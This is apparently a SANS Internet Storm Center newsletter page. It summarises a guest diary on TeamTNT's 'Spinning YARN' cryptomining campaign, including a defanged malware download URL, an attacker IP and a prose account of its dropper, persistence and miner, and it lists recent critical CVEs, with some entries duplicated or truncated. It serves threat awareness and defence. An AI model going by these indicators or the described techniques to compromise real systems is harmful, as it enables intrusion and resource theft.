The Consensus Security Vulnerability Alert

ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html

[Guest Diary] A Deep Dive into TeamTNT and Spinning YARN

Published: 2024-12-18.

Last Updated: 2024-12-18 00:04:50 UTC

by James Levija, SANS.edu BACS Student (Version: 1)

Executive Summary

TeamTNT is running a crypto mining campaign dubbed Spinning YARN. Spinning YARN focuses on exploiting Docker, Redis, YARN, and Confluence [2]. On November 4th, 2024, my DShield sensor recorded suspicious activity targeting my web server. The attacker attempted to use a technique that tricks the server into running harmful commands. This technique is known as server-side scripting vulnerability. This attack originated from IPv4 address 47.93.56.107 targeting port 8090. The attacker used a technique to disguise their harmful code by encoding it. This technique hides the code’s true purpose and assists with avoiding detection against antivirus software and firewalls.

An analysis of the obfuscated code revealed that the command would send the victim to another website to download a malicious file. The malicious file dropped is named “w.sh” [3]. The purpose of this initial file is to install the requirements to run the intended malware and to download the intended malware from the site hxxp://b[.]9-9-8[.]com/brysj. Once the intended malware is downloaded, it runs and assesses the environment. It targets Linux distributions and cloud environments. The malware identifies possible cloud security and attempts to disable it to allow the rest of the code to run smoothly. The malware then sets up its persistence through creating secure keys to talk back to the attacker’s server and establishes a connection to the attacker’s server. It also uses techniques to hide itself on the victim’s device or cloud environment. Finally, the malware sets up a crypto miner to utilize the victim’s resources for the attacker’s gain ...

The impact of this attack extends beyond consuming system resources for cryptocurrency mining. The connection between the victim’s machine or cloud environment and the attacker grants the attacker persistent access. The attacker can abuse this through conducting additional exploits, steal sensitive data, or use the system to launch additional attacks on other systems. TeamTNT is known to have created a work that could steal Amazon Web Service (AWS) credentials. This poses significant risks to operational security and data integrity for any organization.

This attack highlights evolving threats to Linux and cloud environments from sophisticated groups like TeamTNT. Organizations should prioritize securing their infrastructure through regular updates, monitoring suspicious activity, staying up to date on cyber threat intelligence, and implementing robust defenses against malware and their obfuscation techniques. Collaboration withing the cybersecurity community is key to mitigating these ongoing threats ...

Read the full entry: https://isc.sans.edu/diary/Guest+Diary+A+Deep+Dive+into+TeamTNT+and+Spinning+YARN/31530/

Apple Updates Everything (iOS, iPadOS, macOS, watchOS, tvOS, visionOS)

Published: 2024-12-11.

Last Updated: 2024-12-11 19:59:25 UTC

by Johannes Ullrich (Version: 1)

Apple today released patches for all of its operating systems. The updates address 46 different vulnerabilities. Many of the vulnerabilities affect more than one operating system. None of the vulnerabilities are labeled as being already exploited ...

Read the full entry: https://isc.sans.edu/diary/Apple+Updates+Everything+iOS+iPadOS+macOS+watchOS+tvOS+visionOS/31514/

Santa’s elves arrive back at the North Pole and are working hard to get ready for the holiday gift-giving season. You’ll get to help Alabaster Snowball, Wombley Cube, and the rest of the gang clean up to restore operations at the North Pole!

"I highly recommend building your infosec skills using the free and incredibly awesome Holiday Hack Challenge by Ed and his team." - SANS Holiday Hack Player

Play for free: https://www.sans.org/mlp/holiday-hack-challenge-2024/

Python Delivering AnyDesk Client as RAT (2024.12.17)

https://isc.sans.edu/diary/Python+Delivering+AnyDesk+Client+as+RAT/31524/

Exploit attempts inspired by recent Struts2 File Upload Vulnerability (CVE-2024-53677, CVE-2023-50164) (2024.12.15)

https://isc.sans.edu/diary/Exploit+attempts+inspired+by+recent+Struts2+File+Upload+Vulnerability+CVE202453677+CVE202350164/31520/

The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

Product: VMware vCenter Server

CVSS Score: 0

** KEV since 2024-11-20 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812

ISC Podcast: https://isc.sans.edu/podcastdetail/9252

Product: VMware vCenter Server

CVSS Score: 0

** KEV since 2024-11-20 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38813

ISC Podcast: https://isc.sans.edu/podcastdetail/9252

Product: Cleo Harmony

CVSS Score: 0

** KEV since 2024-12-13 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-50623

ISC Podcast: https://isc.sans.edu/podcastdetail/9252

Product: Cleo Harmony

CVSS Score: 9.8

** KEV since 2024-12-17 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55956

NVD References:

- https://support.cleo.com/hc/en-us/articles/28408134019735-Cleo-Product-Security-Advisory-CVE-Pending

- https://support.cleo.com/hc/en-us/articles/28408134019735-Cleo-Product-Security-Update

- https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild

Product: Microsoft Windows 10 1507

CVSS Score: 7.8

** KEV since 2024-12-10 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-49138

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138

Product: Adobe ColdFusion 2023

CVSS Score: 0

** KEV since 2024-12-16 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-20767

Product: Adobe Connect

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54032

NVD References: https://helpx.adobe.com/security/products/connect/apsb24-99.html

Product: Apache Struts

CVSS Score: 0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-53677

ISC Diary: https://isc.sans.edu/diary/31520

ISC Podcast: https://isc.sans.edu/podcastdetail/9254

NVD References: https://cwiki.apache.org/confluence/display/WW/S2-067

Product: Apache Struts

CVSS Score: 0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-50164

ISC Diary: https://isc.sans.edu/diary/31520

ISC Podcast: https://isc.sans.edu/podcastdetail/9256

Product: Apache Tomcat

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-50379

NVD References: https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r

NVD References: http://www.openwall.com/lists/oss-security/2024/12/17/4

Product: Ivanti CSA

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11639

ISC Podcast: https://isc.sans.edu/podcastdetail/9250

NVD References:

CVE-2024-11772 - Ivanti CSA before version 5.0.3 is vulnerable to command injection, enabling a remote authenticated attacker with admin privileges to execute remote code.

Product: Ivanti CSA

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11772

ISC Podcast: https://isc.sans.edu/podcastdetail/9250

NVD References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773

CVE-2024-11772 - Ivanti CSA before version 5.0.3 is vulnerable to command injection, enabling a remote authenticated attacker with admin privileges to execute remote code.

Product: Ivanti CSA

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11772

ISC Podcast: https://isc.sans.edu/podcastdetail/9250

NVD References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773

CVE-2024-11773 - Ivanti CSA before version 5.0.3 is vulnerable to SQL injection in the admin web console, enabling a remote attacker with admin privileges to execute arbitrary SQL queries.

Product: Ivanti CSA

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11773

ISC Podcast: https://isc.sans.edu/podcastdetail/9250

NVD References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773

Product: Ivanti Connect Secure

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11633

NVD References: https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs

Product: Ivanti Connect Secure and Policy Secure

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11634

NVD References: https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs

Product: Drupal Core

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55636

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55637

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55638

NVD References:

- https://www.drupal.org/sa-core-2024-006

- https://www.drupal.org/sa-core-2024-007

- https://www.drupal.org/sa-core-2024-008

Product: CrushFTP

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-53552

NVD References: https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update

Product: CrushFTP

CVSS Score: 9.6 AtRiskScore 30

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11986

NVD References: https://crushftp.com/crush11wiki/Wiki.jsp?page=Update

Product: MSA Safety FieldServer Gateways

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45493

NVD References:

- https://us.msasafety.com/fieldserver

- https://us.msasafety.com/security-notices

Product: MSA Safety FieldServer Gateways

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45494

NVD References:

- https://us.msasafety.com/fieldserver

- https://us.msasafety.com/security-notices

Product: Nette DatabaseCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55586NVD References: - https://github.com/CSIRTTrizna/CVE-2024-55586- https://github.com/nette/database/releases- https://www.csirt.sk/nette-framework-vulnerability-permits-sql-injection.htmlCVE-2024-5660 - Travis hardware vulnerability may allow bypass of Stage-2 translation and/or GPT protection.Product: Armv8 Arm processorsCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-5660NVD References: https://developer.arm.com/Arm%20Security%20Center/Arm%20CPU%20Vulnerability%20CVE-2024-5660CVE-2024-54751 - COMFAST CF-WR630AX v2.7.0.2 has a hardcoded password vulnerability in /etc/shadow, enabling root access for attackers.Product: COMFAST CF-WR630AXCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54751NVD References: https://colorful-meadow-5b9.notion.site/CF-WR630AX_HardCode_vuln-14bc216a1c3080968161ce15e35fa652?pvs=4CVE-2024-12286 - MOBATIME Network Master Clock - DTS 4801 allows attackers to use SSH to gain initial access using default credentials.Product: MOBATIME Network Master Clock - DTS 4801CVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-12286NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-01CVE-2024-46442 - An issue in the BYD Dilink Headunit System v3.0 to v4.0 allows attackers to bypass authentication via a bruteforce attack.Product: BYD Dilink Headunit SystemCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46442NVD References: - http://byd.com- https://github.com/zgsnj123/BYD_headunit_vuls/tree/main- https://www.bydauto.com.cn/CVE-2024-11737 - Schneider Electric Modicon Controllers are vulnerable to a denial of service and loss of confidentiality and integrity due to an Improper Input Validation vulnerability when an unauthenticated crafted Modbus packet is received.Product: Schneider Electric Modicon Controllers M241 / M251 / M258 and Modicon Controllers LMC058 products.The Modicon M241/M251/M258/LMC058 products are Programmable Logic Controllers CVSS Score: 9.8 AtRiskScore 30NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11737NVD References: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-345-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-345-03.pdfCVE-2024-11948 - GFI Archiver is vulnerable to remote code execution through a flaw in the product installer, allowing attackers to execute code without authentication.Product: GFI ArchiverCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11948NVD References: https://www.zerodayinitiative.com/advisories/ZDI-24-1671/CVE-2024-45337 - Applications and libraries which misuse the ServerConfig.PublicKeyCallback callback may be susceptible to an authorization bypass.Product: Golang Cryptography LibraryCVSS Score: 9.1NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45337NVD References: - https://github.com/golang/crypto/commit/b4f1988a35dee11ec3e05d6bf3e90b695fbd8909- https://go.dev/cl/635315- https://go.dev/issue/70779- https://groups.google.com/g/golang-announce/c/-nPEi39gI4Q/m/cGVPJCqdAQAJ- https://pkg.go.dev/vuln/GO-2024-3321- http://www.openwall.com/lists/oss-security/2024/12/11/2CVE-2024-49112 - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution VulnerabilityProduct: Microsoft Windows Lightweight Directory Access Protocol (LDAP)CVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-49112NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49112CVE-2024-55884 - Mullvad VPN client is vulnerable to heap-based out-of-bounds writes in exception-handling, which can lead to code execution.Product: Mullvad VPN clientCVSS Score: 9.0NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55884NVD References: - https://github.com/mullvad/mullvadvpn-app/commit/ef6c862071b26023802b00d6e1dc6ca53d1ab3e6- https://news.ycombinator.com/item?id=42390768- https://x41-dsec.de/news/2024/12/11/mullvad/CVE-2024-44241, CVE-2024-44242, CVE-2024-44299 - iOS and iPadOS versions 18.0 and earlier may allow attackers to execute arbitrary code or cause unexpected system termination in DCP firmware due to inadequate bounds checks.Product: Apple iOS and iPadOSCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44241NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44242NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44299NVD References: https://support.apple.com/en-us/121563CVE-2024-54465 - macOS Sequoia 15.2 has an unresolved logic issue in state management that could potentially allow an app to elevate privileges.Product: Apple macOS SequoiaCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54465NVD References: https://support.apple.com/en-us/121839CVE-2024-54492 - macOS Sequoia 15.2, iOS 18.2, iPadOS 18.2, iPadOS 17.7.3, and visionOS 2.2 are vulnerable to network traffic manipulation by attackers on privileged networks, mitigated by implementing HTTPS.Product: Apple macOS SequoiaCVSS Score: 9.8NVD: https://nvd.nist.go…

Product: Armv8 Arm processors

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-5660

NVD References: https://developer.arm.com/Arm%20Security%20Center/Arm%20CPU%20Vulnerability%20CVE-2024-5660

Product: COMFAST CF-WR630AX

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54751

NVD References: https://colorful-meadow-5b9.notion.site/CF-WR630AX_HardCode_vuln-14bc216a1c3080968161ce15e35fa652?pvs=4

Product: MOBATIME Network Master Clock - DTS 4801

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-12286

NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-01

Product: BYD Dilink Headunit System

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46442

NVD References:

- http://byd.com

- https://github.com/zgsnj123/BYD_headunit_vuls/tree/main

- https://www.bydauto.com.cn/

Product: Schneider Electric Modicon Controllers M241 / M251 / M258 and Modicon Controllers LMC058 products.

The Modicon M241/M251/M258/LMC058 products are Programmable Logic Controllers

CVSS Score: 9.8 AtRiskScore 30

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11737

NVD References: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-345-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-345-03.pdf

Product: GFI Archiver

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11948

NVD References: https://www.zerodayinitiative.com/advisories/ZDI-24-1671/

Product: Golang Cryptography Library

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45337

NVD References:

- https://github.com/golang/crypto/commit/b4f1988a35dee11ec3e05d6bf3e90b695fbd8909

- https://go.dev/cl/635315

- https://go.dev/issue/70779

- https://groups.google.com/g/golang-announce/c/-nPEi39gI4Q/m/cGVPJCqdAQAJ

- https://pkg.go.dev/vuln/GO-2024-3321

- http://www.openwall.com/lists/oss-security/2024/12/11/2

Product: Microsoft Windows Lightweight Directory Access Protocol (LDAP)

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-49112

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49112

Product: Mullvad VPN client

CVSS Score: 9.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55884

NVD References:

- https://github.com/mullvad/mullvadvpn-app/commit/ef6c862071b26023802b00d6e1dc6ca53d1ab3e6

- https://news.ycombinator.com/item?id=42390768

- https://x41-dsec.de/news/2024/12/11/mullvad/

Product: Apple iOS and iPadOS

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44241

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44242

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44299

NVD References: https://support.apple.com/en-us/121563

Product: Apple macOS Sequoia

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54465

NVD References: https://support.apple.com/en-us/121839

Product: Apple macOS Sequoia

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54492

NVD References:

- https://support.apple.com/en-us/121837

- https://support.apple.com/en-us/121838

- https://support.apple.com/en-us/121839

- https://support.apple.com/en-us/121845

Product: Apple macOS Sequoia

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54506

NVD References: https://support.apple.com/en-us/121839

Product: Apple Safari

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54534

NVD References:

- https://support.apple.com/en-us/121837

- https://support.apple.com/en-us/121839

- https://support.apple.com/en-us/121843

- https://support.apple.com/en-us/121844

- https://support.apple.com/en-us/121845

- https://support.apple.com/en-us/121846

Product: Node-RED Custom Nodes

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-21574

NVD References:

- https://github.com/ltdrdata/ComfyUI-Manager/blob/ffc095a3e5acc1c404773a0510e6d055a6a72b0e/glob/manager_server.py#L798

- https://github.com/ltdrdata/ComfyUI-Manager/commit/ffc095a3e5acc1c404773a0510e6d055a6a72b0e

Product: PHPGurukul Beauty Parlour Management System

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-53480

NVD References:

- http://phpgurukul.com

- https://github.com/sbksibi/CVEs/blob/main/CVE-2024-53480.md

Product: PHPGurukul Online Nurse Hiring System

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54842

NVD References: https://github.com/achchhelalchauhan/phpgurukul/blob/main/SQL%20injection%20ONHP-forgetpass-mobileno.pdf

Product: PHPGurukul Online Nurse Hiring System

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55099

NVD References:

- https://github.com/achchhelalchauhan/phpgurukul/blob/main/SQL%20injection%20ONHP-username.pdf

-

Product: PHPGurukul Pre-School Enrollment System Project

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54810

NVD References:

- https://github.com/Santoshcyber1/CVE-wirteup/blob/main/Phpgurukul/Pre-School%20Enrollment/SQL%20Injection%20pre-school%20pa.pdf

- https://github.com/Santoshcyber1/CVE-wirteup/blob/main/Phpgurukul/Pre-School%20Enrollment/SQL%20Injection%20pre-school%20pa.pdf

Product: PHPGurukul Park Ticketing Management System

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54811

NVD References:

- https://github.com/Santoshcyber1/CVE-wirteup/blob/main/Phpgurukul/Park%20ticket/report%20sql.pdf

- https://github.com/Santoshcyber1/CVE-wirteup/blob/main/Phpgurukul/Park%20ticket/report%20sql.pdf

Product: Microsoft Update Catalog

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-49147

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49147

Product: XWiki Extension Repository Application

CVSS Score: 9.9

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55662

NVD References:

- https://github.com/xwiki/xwiki-platform/commit/8659f17d500522bf33595e402391592a35a162e8

- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-j2pq-22jj-4pm5

- https://jira.xwiki.org/browse/XWIKI-21890

- https://jira.xwiki.org/browse/XWIKI-21890

Product: XWiki Platform

CVSS Score: 9.9

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55877

NVD References:

- https://github.com/xwiki/xwiki-platform/commit/40e1afe001d61eafdf13f3621b4b597a0e58a3e3

- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2r87-74cx-2p7c

- https://jira.xwiki.org/browse/XWIKI-22030

- https://jira.xwiki.org/browse/XWIKI-22030

Product: XWiki Platform

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55879

NVD References:

- https://github.com/xwiki/xwiki-platform/commit/8493435ff9606905a2d913607d6c79862d0c168d

- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-r279-47wg-chpr

- https://jira.xwiki.org/browse/XWIKI-21207

- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-wh34-m772-5398

Product: ComfyUI Bmad-Nodes

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-21576

NVD References: https://github.com/bmad4ever/comfyui_bmad_nodes/blob/392af9490cbadf32a1fe92ff820ebabe88c51ee8/cv_nodes.py#L1814

Product: ComfyUI Ace Nodes

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-21577

NVD References: https://github.com/hay86/ComfyUI_AceNodes/blob/5ba01db8a3b7afb8e4aecfaa48823ddeb132bbbb/nodes.py#L1193

Product: http4k

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55875

NVD References:

- https://github.com/http4k/http4k/blob/25696dff2d90206cc1da42f42a1a8dbcdbcdf18c/core/format/xml/src/main/kotlin/org/http4k/format/Xml.kt#L42-L46

- https://github.com/http4k/http4k/commit/35297adc6d6aca4951d50d8cdf17ff87a8b19fbc

- https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw

- https://github.com/http4k/http4k/security/advisories/GHSA-7mj5-hjjj-8rgw

Product: PlexTrac

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11834

NVD References: https://docs.plextrac.com/plextrac-documentation/master/security-advisories#release-2.11.0

Product: Menlo On-Premise Appliance

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-29476

NVD References: https://www.menlosecurity.com/published-security-vulnerabilities

Product: Syncfusion Essential Studio for ASP.NET MVC

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55969

NVD References: https://ej2.syncfusion.com/aspnetmvc/documentation/release-notes/27.1.55?type=all

Product: Chunghwa Telecom TenderDocTransfer

CVSS Score: 9.6

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-12641

NVD References:

- https://www.twcert.org.tw/en/cp-139-8299-42168-2.html

- https://www.twcert.org.tw/tw/cp-132-8292-4fd98-1.html

Product: Siemens SINEC NMS

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-49775

NVD References: https://cert-portal.siemens.com/productcert/html/ssa-928984.html

Product: WeasisCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55557NVD References: - https://apps.microsoft.com/detail/9nhtv46lg4nh?hl=en-us&gl=US- https://github.com/nroduit/Weasis/releases/tag/v4.5.1- https://github.com/partywavesec/CVE-2024-55557- https://www.partywave.site/show/research/CVE-2024-55557%20-%20Weasis%204.5.1CVE-2024-29671 - NEXTU FLATA AX1500 Router v.1.0.2 is vulnerable to a buffer overflow that allows remote attackers to execute arbitrary code through the POST request handler component.Product: NEXTU FLATA AX1500 RouterCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-29671NVD References: - https://ez-net.co.kr/new_2012/customer/download_view.php?cid=&sid=&goods=&cate=&q=Ax1500&seq=228- https://gist.github.com/laskdjlaskdj12/4afc8b5d75640bd28eaf32de3ceda48a- https://github.com/laskdjlaskdj12/CVE-2024-29671-POCCVE-2024-52949 - iptraf-ng 1.2.1 has a stack-based buffer overflow.Product: iptraf-ng 1.2.1CVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-52949NVD References: - https://github.com/iptraf-ng/iptraf-ng/releases/tag/v1.2.1- https://www.gruppotim.it/it/footer/red-team.html- https://www.gruppotim.it/it/footer/red-team.htmlCVE-2024-55085 - GetSimple CMS CE 3.3.19 allows attackers to execute arbitrary code via the template editing function in the background management system.Product: GetSimple CMS CECVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55085NVD References: - https://getsimple-ce.ovh/- https://tasteful-stamp-da4.notion.site/CVE-2024-55085-15b1e0f227cb80a5aee6faeb820bf7e6CVE-2024-10205 - Hitachi Ops Center Analyzer and Hitachi Infrastructure Analytics Advisor on Linux, 64 bit are vulnerable to an authentication bypass issue from version 10.0.0-00 through 4.4.0-00.Product: Hitachi Ops Center AnalyzerCVSS Score: 9.4NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10205NVD References: https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-151/index.htmlCVE-2024-12356 - All BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) versions contain a command injection vulnerability which can be exploited through a malicious client request. Product: BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS)CVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-12356NVD References: - https://nvd.nist.gov/vuln/detail/CVE-2024-12356- https://www.beyondtrust.com/trust-center/security-advisories/bt24-10- https://www.cve.org/CVERecord?id=CVE-2024-12356CVE-2024-8972 - Mobil365 Informatics Saha365 App is vulnerable to SQL Injection before 30.09.2024.Product: Mobil365 Informatics Saha365 AppCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8972NVD References: https://www.usom.gov.tr/bildirim/tr-24-1890CVE-2024-11015 - The Sign In With Google plugin for WordPress is vulnerable to authentication bypass, allowing unauthenticated attackers to log in as the first user who signed in using Google OAuth. Product: Sign In With Google pluginActive Installations: This plugin has been closed as of December 10, 2024 and is not available for download. This closure is temporary, pending a full review.CVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11015NVD References: - https://plugins.trac.wordpress.org/browser/sign-in-with-google/trunk/src/admin/class-sign-in-with-google-admin.php#L525- https://www.wordfence.com/threat-intel/vulnerabilities/id/afe894b0-5e91-4aa2-bbd1-1f74274701cf?source=cveCVE-2024-10124 - The Vayu Blocks plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation, enabling unauthenticated attackers to achieve remote code execution.Product: Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerceActive Installations: 1,000+CVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10124NVD References: - https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L28- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L46- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/core/class-installation.php#L29- https://plugins.trac.wordpress.org/changeset/3173408/- https://plugins.trac.wordpress.org/changeset/3203532/vayu-blocks/tags/1.2.0/inc/vayu-sites/app.php- https://www.wordfence.com/threat-intel/vulnerabilities/id/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cveCVE-2024-9290 - The Super Backup & Clone - Migrate for WordPress plugin is vulnerable to arbitrary file uploads, allowing unauthenticated attackers to upload files and potentially execute remote code.Product: Super Backup & Clone - Migrate for WordPressActive Installations: unknownCVSS Score: 9.8NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-9290NVD References: - https://codecanyon.net/item/super-backup-clone-migrate-for-wordpress/12943030- https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=cveCVE-2022-46838 - JS Help Desk – Best Help Des…

Product: NEXTU FLATA AX1500 Router

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-29671

NVD References:

- https://ez-net.co.kr/new_2012/customer/download_view.php?cid=&sid=&goods=&cate=&q=Ax1500&seq=228

- https://gist.github.com/laskdjlaskdj12/4afc8b5d75640bd28eaf32de3ceda48a

-

Product: iptraf-ng 1.2.1

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-52949

NVD References:

- https://github.com/iptraf-ng/iptraf-ng/releases/tag/v1.2.1

- https://www.gruppotim.it/it/footer/red-team.html

- https://www.gruppotim.it/it/footer/red-team.html

Product: GetSimple CMS CE

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55085

NVD References:

- https://getsimple-ce.ovh/

-

Product: Hitachi Ops Center Analyzer

CVSS Score: 9.4

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10205

NVD References: https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-151/index.html

Product: BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS)

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-12356

NVD References:

- https://nvd.nist.gov/vuln/detail/CVE-2024-12356

- https://www.beyondtrust.com/trust-center/security-advisories/bt24-10

- https://www.cve.org/CVERecord?id=CVE-2024-12356

